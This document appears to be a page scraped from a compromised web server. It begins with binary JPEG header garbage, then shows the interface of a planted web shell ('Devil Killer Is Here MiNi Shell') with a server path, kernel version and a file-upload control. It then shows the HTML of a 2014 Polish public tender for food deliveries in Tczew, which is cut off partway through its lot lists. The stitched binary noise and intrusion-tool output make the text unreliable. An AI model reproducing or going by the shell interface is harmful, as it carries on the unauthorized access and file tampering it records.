JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141001/325114-N-2014.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2015 r.</b><br>
<b>Numer ogłoszenia: 325114 - 2014; data zamieszczenia: 01.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2015 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	UWAGA WAŻNE !!! Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
2.	UWAGA WAŻNE !!! Pełnomocnictwo do reprezentowania wykonawcy musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).
3.	UWAGA WAŻNE !!! Niedopuszczalne jest zmienianie asortymentu w formularzach cenowych np. wpisywanie asortymentów o innej gramaturze, innej ilości,  itp. 
Dokonanie wszelkich zmian  w formularzach cenowych będzie skutkowało odrzuceniem oferty wykonawcy na podstawie art. 89 ust 1 pkt. 2 uPzP. 
4.	Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie od 1 stycznia 2015 r. do dnia 31 grudnia 2015 roku do: Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10. 
5.	Przedmiot zamówienia podzielono na 27 zadań częściowych:
Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje 
Zadanie nr 15 - cukiernicze produkty 
Zadanie nr 16 - owoce świeże   
Zadanie nr 17 - owoce przetworzone  
Zadanie nr 18 - warzywa świeże
Zadanie nr 19 - warzywa przetworzone
Zadanie nr 20 - jaja
Zadanie nr 21 - mięso i produkty mięsne 
Zadanie nr 22 - ryby i przetwory konserwowe 
Zadanie nr 23 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 24 - produkty skrobi - mąka  
Zadanie nr 25 - różne produkty spożywcze 
Zadanie nr 26- oleje i tłuszcze roślinne 
Zadanie nr 27 - produkty mleczarskie  
6.	Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy).
7.	Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
8.	Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
9.	Cykliczne dostawy  będą realizowane jak następuje:  
10.	Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
11.	Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
12.	Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument.
13.	 Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
14.	Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
15.	Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
16.	W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
17.	Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
18.	Do składania zamówień Zamawiający upoważni wybranego pracownika.
19.	Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
20.	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
21.	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
22.	Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
23.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 90 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 10 % wartości zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 03.14.25.00-3, 15.30.00.00-1, 15.81.00.00-9, 15.00.00.00-8, 15.80.00.00-6, 15.13.11.20-2, 15.13.11.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający zaleca dołączyć dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
2.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
3.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć formę prawną konsorcjum zawiązanego w drodze umowy cywilnej. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
-Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
-W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
-Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
-Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.  
-W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorska.ohp.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 6.	Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. ul. uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2014 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	25
banany	kg	40
brzoskwinie	kg	40
cytryny	kg	10
gruszki	kg	40
jabłka	kg	300
kiwi	kg	10
mandarynki	kg	30
nektaryny	kg	20
pomarancza	kg	20
truskawki	kg	15
winogrona	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany 400-450 ml	szt	30
brzoskwinie kons. 900 ml	szt	20
Dżem  260g	szt	200
kompot wiśniowy 0,9 l	szt	10
rodzynki suszone 100g	szt	20
syrop owocowy 1l	szt	20
syrop owocowy 4,96l	szt	38.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuł	szt	35
burak	kg	200
burak młody - botwina	szt	20
cebula	kg	200
czosnek	szt	25
fasola drobna 	kg	20
fasola jaś	kg	25
fasola szparagowa	kg	15
groch łuska 0,5kg	szt	30
kalafior	szt	65
kapusta 	kg	150
kapusta czerwona	kg	15
kapusta młoda 	szt	50
kapusta pekińska	kg	40
koper	szt	100
marchew młoda	kg	50
marchew myta	kg	300
ogórek świeży	kg	200
papryka świeża	kg	80
pieczarka	kg	80
pietruszka korzeń	kg	10
pomidor	kg	150
por 	szt	40
por 	kg	50
rzodkiewka pęczki	szt	120
sałata	szt	100
seler	kg	190
szczypiorek	szt	50
zielenina natka	szt	150
ziemniaki 	kg	3000
ziemniaki młode	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	5
groszek konserwowy 400g	szt	20
kapusta kiszona  	kg	150
koncentrat pomidorowy 0,9l - 1l	szt	45
kukurydza konserwowa 400g	szt	20
ogórki kiszone 	kg	100
ogórki konserwowe 0,9l	szt	70
ogórki małosolne	kg	15
papryka konserwowa 0,9l	szt	50
pieczarka konserwowa 0,9l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły mroż. 450 g 	szt	20
brukselka mroż 450 g 	szt	10
kalafior mroż	kg	20
marchew kostka mroż	kg	20
pyzy z mięsem  1kg	kg	20
pyzy z owocami (knedle) 1kg	kg	20
zupa jarzynowa 	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	20
boczek świeży	kg	10
boczek wędzony surowy	kg	80
filet z piersi kurczaka	kg	100
golonka wieprz b/k	kg	5
karkówka wieprz b/k 	kg	100
kaszanka	kg	40
kiełbasa biała  surowa	kg	20
kiełbasa krakowska	kg	40
kiełbasa szynkowa drobiowa	kg	80
kiełbasa szynkowa wieprzowa	kg	75
kiełbasa śląska lub równowazna	kg	80
kiełbasa toruńska lub równowazna	kg	40
korpusy drobiowe(grzbiety)	kg	200
kości wieprzowe	kg	40
łopatka b/k	kg	380
metka  typu wiejska lub równowazna	kg	45
mielonka konserwowa	kg	40
mielonka śniadaniowa lub równowazna	kg	40
mięso gulaszowe	kg	30
mortadela	kg	50
ogonówka 	kg	40
parówka w folii	kg	40
pasztet zapiekany	kg	15
pasztetowa  domowa lub równowazna	kg	45
polędwica drobiowa	kg	60
polędwica sopocka drobiowalub równowazna	kg	30
przysmak śniadaniowy 130g	szt	45
przysmak w konserwie lub równowazny	kg	25
schab wiep b/k	kg	70
serdelki	kg	40
słonina	kg	6
szynka konserwowa 	kg	30
szynka mielona	kg	40
szynka typu królewiecka mielo lub równowazna	kg	15
szynka wiep b/k	kg	30
szynka wieprzowa - wędlina	kg	20
turystyczna lub równowazna 250-380g	szt	45
tyrolska puszka 250-380gg lub równowazna	szt	45
udka z kurczaka	kg	250
wątroba drobiowa z kurczaka	kg	50
wątroba wieprzowa	kg	30
żeberka wieprzowe 	kg	20
żołądki drobiowe	kg	30
żywiecka lub podobne	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> makrela wędzona	kg	25
matijas	kg	20
panga	kg	80
paprykarz 135g	szt	60
szprot w pomidorach 150-250g	szt	50
śledź w pomidorach 300g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
